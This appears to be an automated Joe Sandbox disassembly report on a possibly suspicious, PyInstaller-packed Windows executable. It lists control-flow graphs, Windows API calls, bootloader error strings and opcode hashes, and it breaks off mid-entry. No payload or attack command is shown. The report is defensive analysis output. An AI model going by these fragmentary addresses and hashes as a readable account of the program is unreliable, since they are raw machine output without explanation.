19933->19934 19935 f62eeb ___scrt_is_nonwritable_in_current_image 19933->19935 19934->19898 19936 f66254 _mbstowcs 37 API calls 19935->19936 19937 f62efc 19936->19937 19938 f63002 _mbstowcs 37 API calls 19937->19938 19939 f62f26 GetCurrentProcessId 19938->19939 19939->19898 19951 f59ef7 _mbstowcs __fread_nolock 19950->19951 19952 f59fa2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19951->19952 19953 f59fed _mbstowcs 19952->19953 19953->19892 19955 f59c0e 19954->19955 19956 f5af1e 19955->19956 19970 f5b311 19956->19970 19960 f5af2f 19961 f5af3a 19960->19961 19984 f5b34d 19960->19984 19961->19917 19963 f5af27 19963->19917 19965 f5af46 19964->19965 19966 f5af50 19964->19966 19967 f5b2f6 ___vcrt_uninitialize_ptd 6 API calls 19965->19967 19966->19919 19968 f5af4b 19967->19968 19969 f5b34d ___vcrt_uninitialize_locks DeleteCriticalSection 19968->19969 19969->19966 19971 f5b31a 19970->19971 19973 f5b343 19971->19973 19974 f5af23 19971->19974 19988 f5b575 19971->19988 19975 f5b34d ___vcrt_uninitialize_locks DeleteCriticalSection 19973->19975 19974->19963 19976 f5b2c3 19974->19976 19975->19974 20007 f5b486 19976->20007 19981 f5b2f3 19981->19960 19983 f5b2d8 19983->19960 19985 f5b358 19984->19985 19987 f5b377 19984->19987 19986 f5b362 DeleteCriticalSection 19985->19986 19986->19986 19986->19987 19987->19963 19993 f5b43d 19988->19993 19991 f5b5ad InitializeCriticalSectionAndSpinCount 19992 f5b598 19991->19992 19992->19971 19994 f5b455 19993->19994 19995 f5b478 19993->19995 19994->19995 19999 f5b3a3 19994->19999 19995->19991 19995->19992 19998 f5b46a GetProcAddress 19998->19995 20005 f5b3af ___vcrt_FlsGetValue 19999->20005 20000 f5b423 20000->19995 20000->19998 20001 f5b3c5 LoadLibraryExW 20002 f5b3e3 GetLastError 20001->20002 20003 f5b42a 20001->20003 20002->20005 20003->20000 20004 f5b432 FreeLibrary 20003->20004 20004->20000 20005->20000 20005->20001 20006 f5b405 LoadLibraryExW 20005->20006 20006->20003 20006->20005 20008 f5b43d ___vcrt_FlsGetValue 5 API calls 20007->20008 20009 f5b4a0 20008->20009 20010 f5b4b9 TlsAlloc 20009->20010 20011 f5b2cd 20009->20011 20011->19983 20012 f5b537 20011->20012 20013 f5b43d ___vcrt_FlsGetValue 5 API calls 20012->20013 20014 f5b551 20013->20014 20015 f5b56c TlsSetValue 20014->20015 20016 f5b2e6 20014->20016 20015->20016 20016->19981 20017 f5b2f6 20016->20017 20018 f5b300 20017->20018 20019 f5b306 20017->20019 20021 f5b4c1 20018->20021 20019->19983 20022 f5b43d ___vcrt_FlsGetValue 5 API calls 20021->20022 20023 f5b4db 20022->20023 20024 f5b4f3 TlsFree 20023->20024 20025 f5b4e7 20023->20025 20024->20025 20025->20019 20030 f566c4 20026->20030

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 613 f6d933-f6d963 call f6d261 call f6d267 call f6d2c5 620 f6da82-f6dade call f63b43 call f69476 613->620 621 f6d969-f6d975 call f6d26d 613->621 633 f6dae0-f6dae6 620->633 634 f6dae8-f6daeb 620->634 621->620 626 f6d97b-f6d987 call f6d299 621->626 626->620 632 f6d98d-f6d9ae call f63b77 GetTimeZoneInformation 626->632 643 f6d9b4-f6d9d4 632->643 644 f6da5f-f6da81 call f6d25b call f6d24f call f6d255 632->644 638 f6db35-f6db47 633->638 636 f6daf1-f6db04 call f65ba2 634->636 637 f6daed-f6daef 634->637 651 f6db06 636->651 652 f6db10-f6db29 call f69476 636->652 637->638 641 f6db57 call f6d933 638->641 642 f6db49-f6db4c 638->642 648 f6db5c-f6db71 call f63b77 call f596fa 641->648 642->641 646 f6db4e-f6db55 call f6d692 642->646 649 f6d9d6-f6d9db 643->649 650 f6d9de-f6d9e6 643->650 646->648 649->650 656 f6d9f8-f6d9fa 650->656 657 f6d9e8-f6d9ef 650->657 658 f6db07-f6db0e call f63b77 651->658 668 f6db2e-f6db2f call f63b77 652->668 669 f6db2b-f6db2c 652->669 664 f6d9fc-f6da5c call f5a8f0 * 4 call f6a531 call f6db72 * 2 656->664 657->656 665 f6d9f1-f6d9f6 657->665 678 f6db34 658->678 664->644 665->664 668->678 669->658 678->638
                                                                                                                      APIs
                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
                                                                                                                      • _free.LIBCMT ref: 00F6D993
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6DB5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                      • API String ID: 2155170405-239921721
                                                                                                                      • Opcode ID: 45c5749a6ab7fccdc540e9746cd5d4ba24649f470c1dd7bc3f9fa6649ea75e72
                                                                                                                      • Instruction ID: 04cdd94319d99f13b46b070cb419296252cf97df02765f477dc7c1855cc33a78
                                                                                                                      • Opcode Fuzzy Hash: 45c5749a6ab7fccdc540e9746cd5d4ba24649f470c1dd7bc3f9fa6649ea75e72
                                                                                                                      • Instruction Fuzzy Hash: 3D512C72E00219AFDB10BFB4DC05AAE7B78EF45320F114265F814A7162E7749E44FB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 692 f603e2-f60400 693 f60417-f60419 692->693 694 f60402-f60415 call f5e619 call f63b33 692->694 693->694 696 f6041b-f60436 FindFirstFileExW 693->696 714 f60464-f60470 call f596fa 694->714 697 f60487-f604f5 call f60624 * 3 call f68911 696->697 698 f60438-f60443 GetLastError 696->698 727 f604f7-f604f9 697->727 728 f604fe-f60527 call f63b43 697->728 700 f60454-f60459 call f5e619 698->700 701 f60445-f60448 698->701 717 f6045f 700->717 704 f6047e-f60485 call f5e619 701->704 705 f6044a-f6044d 701->705 704->717 710 f60471-f6047c call f5e619 705->710 711 f6044f-f60452 705->711 710->717 711->700 711->704 721 f60462-f60463 717->721 721->714 727->721 731 f60549-f6054c 728->731 732 f60529-f60534 call f5e619 call f63b33 728->732 731->732 734 f6054e-f60550 731->734 740 f60539 732->740 734->732 736 f60552-f60562 FindNextFileW 734->736 738 f60564-f6056f GetLastError 736->738 739 f605a3-f60611 call f60624 * 3 call f68911 736->739 742 f60580-f6058b call f5e619 738->742 743 f60571-f60574 738->743 744 f6053c-f60548 call f596fa 739->744 764 f60617-f60623 call f63b43 739->764 740->744 742->740 746 f60576-f60579 743->746 747 f6059a-f605a1 call f5e619 743->747 753 f6058d-f60598 call f5e619 746->753 754 f6057b-f6057e 746->754 747->740 753->740 754->742 754->747
                                                                                                                      APIs
                                                                                                                      • FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00F6042B
                                                                                                                      • GetLastError.KERNEL32 ref: 00F60438
                                                                                                                        • Part of subcall function 00F60624: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00F604A8,?), ref: 00F60649
                                                                                                                        • Part of subcall function 00F60624: SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00F604A8,?,?,?,?,00F604A8,?), ref: 00F6065D
                                                                                                                      • FindNextFileW.KERNELBASE(?,?,?), ref: 00F6055A
                                                                                                                      • GetLastError.KERNEL32 ref: 00F60564
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3693236040-0
                                                                                                                      • Opcode ID: 1ef43ae719ea4d41e39593a6c510343d3422047d9851d5b72f8589d419d356f9
                                                                                                                      • Instruction ID: 0ae6789b775f2cab069fe7cd0f2c318e5b4abd73dd0ef3a09e83c59c552c8d7b
                                                                                                                      • Opcode Fuzzy Hash: 1ef43ae719ea4d41e39593a6c510343d3422047d9851d5b72f8589d419d356f9
                                                                                                                      • Instruction Fuzzy Hash: E551D7B19006189FCB35EFB4CC85AABB7E8AF44314F240A56E516C7281EF78DE44AF50
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627C7
                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00F627A4,?,?,?,?,?,00F5C00A), ref: 00F627CE
                                                                                                                      • ExitProcess.KERNEL32 ref: 00F627E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1703294689-0
                                                                                                                      • Opcode ID: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction ID: ed649b7f3ef905d911cfbafec6c0ba88809bbd567e01d6bedf1300f94c5e6612
                                                                                                                      • Opcode Fuzzy Hash: 0b6b6f1089981358f8e89a7c8722e8e47401efdfd1f8d5fa4a1b7ba3537c6626
                                                                                                                      • Instruction Fuzzy Hash: 4FE04631400548EFCF11AF24CC48D083B68EB00351B004520F80A8A532CB39EE81FB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 900c08fc981e5ef944cc89794b80ef5ed10540dc5ba515face4f6b17785decd5
                                                                                                                      • Instruction ID: 50dbc74f2589089a0f664e743bf123a00f88265fa4325fb2003e0b7cffeda9f2
                                                                                                                      • Opcode Fuzzy Hash: 900c08fc981e5ef944cc89794b80ef5ed10540dc5ba515face4f6b17785decd5
                                                                                                                      • Instruction Fuzzy Hash: 00E0EC72A15228EBCB25DB98CE5499AF3ECEB45B54B154496F502E3211C274DE00DBD1

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                      • API String ID: 2638373210-4158440160
                                                                                                                      • Opcode ID: 16c3acf06c030273789f5fab58a663d5feaed36387aa3a9e0eff2e242480517d
                                                                                                                      • Instruction ID: 5ecc2a3e2051054b1bfb9eef16c1b2163bd7af2362ac5ce5d6a4da7e54919e3e
                                                                                                                      • Opcode Fuzzy Hash: 16c3acf06c030273789f5fab58a663d5feaed36387aa3a9e0eff2e242480517d
                                                                                                                      • Instruction Fuzzy Hash: 2F51E771A007009BC718DF28DC46A16B7E1BF48322F548A2DFA4EC3691E675E54CEB43

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 59 f51420-f51434 call f55a40 62 f51436-f5143c 59->62 63 f5143d-f51463 call f55d10 59->63 66 f51465-f51482 call f521e0 63->66 67 f51483-f51488 63->67 69 f514ba-f514d4 call f5bd15 67->69 70 f5148a-f514a2 call f535c0 67->70 77 f514d6-f514ec call f521e0 69->77 78 f514f1-f514f5 69->78 70->69 76 f514a4-f514b5 call f52340 70->76 88 f515e0-f515e5 76->88 77->88 81 f514f7-f514fc call f51040 78->81 82 f5150b-f51520 call f5e380 78->82 89 f51501-f51506 81->89 92 f51522-f51538 call f521e0 82->92 93 f5153d-f51544 82->93 90 f515f7-f515fb call f5b65c 88->90 91 f515e7-f515e8 call f5b65c 88->91 89->88 101 f51600-f5160c 90->101 99 f515ed-f515f0 91->99 92->88 97 f515d7-f515dd call f5e365 93->97 98 f5154a 93->98 97->88 102 f51550-f51552 98->102 99->90 104 f51565 102->104 105 f51554 102->105 109 f51567-f51579 call f5b91e 104->109 107 f51556-f5155c 105->107 108 f5155e-f51563 105->108 107->104 107->108 108->109 112 f5157b-f51591 call f5bf4f 109->112 113 f515ba-f515c3 109->113 118 f51593-f5159e 112->118 119 f515aa-f515b8 112->119 115 f515c8-f515d0 call f521e0 113->115 122 f515d3 115->122 118->108 121 f515a0 118->121 119->115 123 f515a6-f515a8 121->123 124 f515a2-f515a4 121->124 122->97 123->122 124->102 124->123
                                                                                                                      Strings
                                                                                                                      • malloc, xrefs: 00F51528
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F514A5
                                                                                                                      • fopen, xrefs: 00F5146B
                                                                                                                      • Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00F51523
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F514D7
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F515BE
                                                                                                                      • fread, xrefs: 00F515C3
                                                                                                                      • Failed to extract %s: failed to open target file!, xrefs: 00F51466
                                                                                                                      • Failed to extract %s: failed to write data chunk!, xrefs: 00F515AE
                                                                                                                      • fwrite, xrefs: 00F515B3
                                                                                                                      • fseek, xrefs: 00F514DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                      • API String ID: 0-666925554
                                                                                                                      • Opcode ID: 1e6bf7b924d69f67a83b75b114bc6609f55c22b1bb81876c1e645a4ed79d867f
                                                                                                                      • Instruction ID: 96207dbf7a00217aa2da507d7a371771fc96c37ba47a9ff36addc99ef167012b
                                                                                                                      • Opcode Fuzzy Hash: 1e6bf7b924d69f67a83b75b114bc6609f55c22b1bb81876c1e645a4ed79d867f
                                                                                                                      • Instruction Fuzzy Hash: AB4149B2E0030177EB20AE646C46B6B3655BBC0766F084625FF19562C2F775EB0CB293

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,?), ref: 00F5686E
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F56875
                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00F5688C
                                                                                                                      • GetLastError.KERNEL32 ref: 00F56896
                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?), ref: 00F568C5
                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 00F568D6
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F568EE
                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F5691B
                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 00F5693F
                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,?), ref: 00F5694E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                      • Opcode ID: fd31dcb2908cc6c3d9558a4040b8aaa2d2ee05368cea22a8aeaecb99b00890dc
                                                                                                                      • Instruction ID: 366b5da641f052b7a0655d211586edbde62c037c87c26d97b55c3eede81fffbe
                                                                                                                      • Opcode Fuzzy Hash: fd31dcb2908cc6c3d9558a4040b8aaa2d2ee05368cea22a8aeaecb99b00890dc
                                                                                                                      • Instruction Fuzzy Hash: AF31A271504315ABE720DF20DC49B9BBBE8EF48361F840919FA68D2191D774DA4CEBA3

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 149 f644f5-f64505 150 f64507-f6451a call f5e606 call f5e619 149->150 151 f6451f-f64521 149->151 165 f6489e 150->165 153 f64886-f64893 call f5e606 call f5e619 151->153 154 f64527-f6452d 151->154 172 f64899 call f63b33 153->172 154->153 157 f64533-f64559 154->157 157->153 160 f6455f-f64568 157->160 163 f64582-f64584 160->163 164 f6456a-f6457d call f5e606 call f5e619 160->164 168 f64882-f64884 163->168 169 f6458a-f6458d 163->169 164->172 171 f648a1-f648a4 165->171 168->171 169->168 170 f64593-f64597 169->170 170->164 174 f64599-f645b0 170->174 172->165 177 f645b2-f645b5 174->177 178 f64601-f64607 174->178 180 f645b7-f645c0 177->180 181 f645c5-f645cb 177->181 182 f645cd-f645e4 call f5e606 call f5e619 call f63b33 178->182 183 f64609-f64613 178->183 184 f64685-f64695 180->184 181->182 185 f645e9-f645fc 181->185 215 f647b9 182->215 187 f64615-f64617 183->187 188 f6461a-f64638 call f65ba2 call f63b77 * 2 183->188 189 f6475a-f64763 call f6b43e 184->189 190 f6469b-f646a7 184->190 185->184 187->188 219 f64655-f6467e call f64bdd 188->219 220 f6463a-f64650 call f5e619 call f5e606 188->220 204 f647d6 189->204 205 f64765-f64777 189->205 190->189 193 f646ad-f646af 190->193 193->189 197 f646b5-f646d9 193->197 197->189 201 f646db-f646f1 197->201 201->189 206 f646f3-f646f5 201->206 208 f647da-f647f2 ReadFile 204->208 205->204 210 f64779-f64788 GetConsoleMode 205->210 206->189 211 f646f7-f6471d 206->211 213 f647f4-f647fa 208->213 214 f6484e-f64859 GetLastError 208->214 210->204 216 f6478a-f6478e 210->216 211->189 218 f6471f-f64735 211->218 213->214 223 f647fc 213->223 221 f64872-f64875 214->221 222 f6485b-f6486d call f5e619 call f5e606 214->222 217 f647bc-f647c6 call f63b77 215->217 216->208 224 f64790-f647aa ReadConsoleW 216->224 217->171 218->189 230 f64737-f64739 218->230 219->184 220->215 227 f647b2-f647b8 call f5e5e3 221->227 228 f6487b-f6487d 221->228 222->215 234 f647ff-f64811 223->234 225 f647ac GetLastError 224->225 226 f647cb-f647d4 224->226 225->227 226->234 227->215 228->217 230->189 237 f6473b-f64755 230->237 234->217 241 f64813-f64817 234->241 237->189 245 f64830-f6483b 241->245 246 f64819-f64829 call f6420f 241->246 248 f64847-f6484c call f64060 245->248 249 f6483d call f64366 245->249 255 f6482c-f6482e 246->255 256 f64842-f64845 248->256 249->256 255->217 256->255
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3907804496
                                                                                                                      • Opcode ID: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction ID: a7a0e8eb29fb076b53c19a031dd8d6fd14bd5957a19ae675367737c91044f0fd
                                                                                                                      • Opcode Fuzzy Hash: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction Fuzzy Hash: B2C11575E04249AFCF15EFA8CC80BBDBBB0AF4A310F144159E9159B292C734AE41EB21

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 258 f6e4d6-f6e506 call f6e2b2 261 f6e521-f6e52d call f60904 258->261 262 f6e508-f6e513 call f5e606 258->262 268 f6e546-f6e58f call f6e21d 261->268 269 f6e52f-f6e544 call f5e606 call f5e619 261->269 267 f6e515-f6e51c call f5e619 262->267 278 f6e7fb-f6e7ff 267->278 276 f6e591-f6e59a 268->276 277 f6e5fc-f6e605 GetFileType 268->277 269->267 280 f6e5d1-f6e5f7 GetLastError call f5e5e3 276->280 281 f6e59c-f6e5a0 276->281 282 f6e607-f6e638 GetLastError call f5e5e3 CloseHandle 277->282 283 f6e64e-f6e651 277->283 280->267 281->280 287 f6e5a2-f6e5cf call f6e21d 281->287 282->267 297 f6e63e-f6e649 call f5e619 282->297 285 f6e653-f6e658 283->285 286 f6e65a-f6e660 283->286 290 f6e664-f6e6b2 call f6084f 285->290 286->290 291 f6e662 286->291 287->277 287->280 301 f6e6b4-f6e6c0 call f6e42c 290->301 302 f6e6d1-f6e6f9 call f6dfca 290->302 291->290 297->267 301->302 309 f6e6c2 301->309 307 f6e6fe-f6e73f 302->307 308 f6e6fb-f6e6fc 302->308 311 f6e760-f6e76e 307->311 312 f6e741-f6e745 307->312 310 f6e6c4-f6e6cc call f63cca 308->310 309->310 310->278 314 f6e774-f6e778 311->314 315 f6e7f9 311->315 312->311 313 f6e747-f6e75b 312->313 313->311 314->315 317 f6e77a-f6e7ad CloseHandle call f6e21d 314->317 315->278 321 f6e7e1-f6e7f5 317->321 322 f6e7af-f6e7db GetLastError call f5e5e3 call f60a17 317->322 321->315 322->321
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F6E21D: CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E5EA
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E5F1
                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00F6E5FD
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E607
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E610
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E630
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E77D
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E7AF
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E7B6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
